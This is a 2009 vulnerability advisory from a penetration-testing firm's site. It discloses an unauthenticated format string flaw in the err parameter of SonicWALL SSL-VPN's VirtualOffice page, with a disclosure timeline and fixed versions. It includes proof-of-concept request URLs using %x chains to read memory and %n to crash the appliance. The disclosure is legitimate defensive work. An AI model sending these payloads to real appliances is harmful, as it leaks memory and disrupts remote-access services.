OSI Security - Penetration Testing & Web Application Security Consultants
  • Home
  • Try
  • Pricing
  • Services
    • Managed Monthly Penetration Testing Service
    • Managed Quarterly Penetration Testing Service
    • Email Security Review
    • Request a quote for Penetration Testing
    • Bug Bounty Penetration Test
    • Remote Support
  • Solutions
  • Company
    • Advisories
    • Customers
    • News and Press Releases
    • Blog
    • Contact
    • Careers
  • Home
  • Try
  • Pricing
  • Services
    • Managed Monthly Penetration Testing Service
    • Managed Quarterly Penetration Testing Service
    • Email Security Review
    • Request a quote for Penetration Testing
    • Bug Bounty Penetration Test
    • Remote Support
  • Solutions
  • Company
    • Advisories
    • Customers
    • News and Press Releases
    • Blog
    • Contact
    • Careers

SonicWALL SSL-VPN cgi-bin/welcome/VirtualOffice err Parameter Remote Format String

Release Date:
29-May-2009

Software:
SonicWALL - SSL-VPN Remote Access
http://www.sonicwall.com/

Description:
"SonicWALL SSL VPN appliances provide small and mid-size organizations an
easy-to-use, secure and affordable remote access solution that requires no
pre-installed client software. Utilizing a standard Web browser, authorized
users such as employees, contractors, partners and customers, can easily and
securely access e-mail, files, intranets, Web and legacy applications
and remote desktops from any location."

Versions affected:
SonicWALL SSL-VPN 2000/4000 3.5.0.4 and below.
SonicWALL SSL-VPN 200 3.0.0.8 and below.

Vulnerability discovered:
Format string vulnerability.

Vulnerability impact:
High - Remote code execution, and the ability to remotely map out the internal memory structures.
Vulnerability information:
This vulnerability allows remote attackers to execute format string specifiers
on the remote appliance as an unauthenticated user.
The device uses a HTML form, where failed authentication results in an error:
"Login failed - Incorrect name/password"
https://[target]/cgi-bin/welcome/VirtualOffice?err=Login%20failed%20-%20Incorrect%20name%2Fpassword
By inserting format strings instead of expected input, the statement is interpreted
by printf() and the result is returned in a HTTP GET response.

Examples:
The following GET request will result in "ABCD0044434241" being returned.
https://[target]/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x
0x44434241 is the little endian hexadecimal representation for ABCD.
It is possible to read memory remotely by specifying further format
strings, such as:
https://[target]/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
returns
"007825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578254007120040304d8cbffff22840221389804b1e04007127925000"
This may reveal sensitive information.
Attempts to write to memory result in an error, indicating that an access violation
may have occurred, therefore remote code execution is likely possible with further research (i.e. physical access :).
https://[target]/cgi-bin/welcome/VirtualOffice?err=%n
"Sorry, the SSL-VPN you are trying to reach is unavailable at this time. Please try again later."

Credit:
Patrick Webster
​
Disclosure timeline:
12-Jan-2009 - Discovered during audit.
09-Feb-2009 - 1st email sent to security@sonicwall.com. No response.
27-Feb-2009 - 2nd email sent to security@sonicwall.com. No response.
01-May-2009 - Asked contacts within the security industry for SonicWALL contact.
07-May-2009 - Received email from SonicWALL contact.
08-May-2009 - Sent details to SonicWALL contact.
15-May-2009 - SSL 200 - 3.0.0.9 fix released.
27-May-2009 - SSL 2000/4000 - 3.5.0.5 fix released.
29-May-2009 - Public disclosure.
NSW Government ICT Services (SCM0020) approved supplier
OSI Security is an approved supplier to the Victorian Government
OSI Security is an approved supplier to the Queensland Government
OSI Security is an approved supplier to the New Zealand Government
Picture
External Penetration Testing
Managed Security Services
​Source Code Review
Web Application Security Testing
Firewall Configuration and Rulesets
WiFi Access Point and Client Auditing
Forensics and Data Recovery
System Hardening and Configuration
Metasploit Pro
Tenable Nessus
Acunetix Web Scanner
Nexpose Vulnerability
Secunia Software Inspection
Elcomsoft Password Cracking
PortSwigger BurpSuite
HP Fortify
 
Contact
Clients
Advisories
Privacy policy
​
Ethics Statement
Disclosure Policy
OSI SECURITY ACN 144 579 751 © 2010 - 2023.
​ALL RIGHTS RESERVED. SYDNEY, AUSTRALIA.
Join newsletter

Picture

OSI Security is proud to support a number of recognised charities, development projects and industry groups...

The Australian Computer Museum Society Incorporated
Hackers Helping Hackers
sqlmap.org
Metasploit Framework
2600-AU Australia